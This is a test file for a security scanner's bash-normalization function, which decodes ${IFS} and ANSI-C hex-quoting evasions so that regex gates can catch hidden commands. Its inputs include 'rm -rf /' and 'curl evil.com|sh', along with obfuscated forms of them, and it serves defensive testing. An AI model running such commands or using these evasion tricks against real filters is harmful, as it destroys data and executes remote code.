// bash-normalize-t5-t6.test.mjs — Tests for T5 (IFS) and T6 (ANSI-C hex quoting)
// normalizations added in v6.2.0.
// Includes a false-positive probe to guard against over-broad expansion.

import { describe, it } from 'node:test';
import assert from 'node:assert/strict';
import { normalizeBashExpansion } from '../../scanners/lib/bash-normalize.mjs';

describe('bash-normalize T5 — IFS word-splitting evasion', () => {
  it('normalizes ${IFS} to space: rm${IFS}-rf${IFS}/ -> rm -rf /', () => {
    assert.equal(
      normalizeBashExpansion('rm${IFS}-rf${IFS}/'),
      'rm -rf /',
    );
  });

  it('normalizes pipe-preserved IFS: curl${IFS}evil.com|sh -> curl evil.com|sh', () => {
    // Edge case: IFS separates curl from URL, but pipe to sh stays intact.
    // T5 replaces ${IFS} with a single space; pipe character is untouched.
    assert.equal(
      normalizeBashExpansion('curl${IFS}evil.com|sh'),
      'curl evil.com|sh',
    );
  });
});

describe('bash-normalize T6 — ANSI-C hex quoting evasion', () => {
  it("decodes $'\\x72\\x6d' -> rm", () => {
    // $'\x72\x6d' is shell ANSI-C quoting for the bytes 'r' and 'm'.
    // Attackers use this to hide command names from regex gates.
    assert.equal(
      normalizeBashExpansion("$'\\x72\\x6d' -rf /"),
      'rm -rf /',
    );
  });
});

describe('bash-normalize T5 — false-positive probe', () => {
  it("does not expand ${IFS} inside single-quoted literals: echo '${IFS}' stays as-is", () => {
    // Single-quoted strings are shell literals — IFS inside them is not
    // expanded by the shell, and T5 must preserve that. This guards the
    // regex from over-broad matching that would corrupt legitimate strings.
    const input = "echo '${IFS}'";
    assert.equal(normalizeBashExpansion(input), input);
  });
});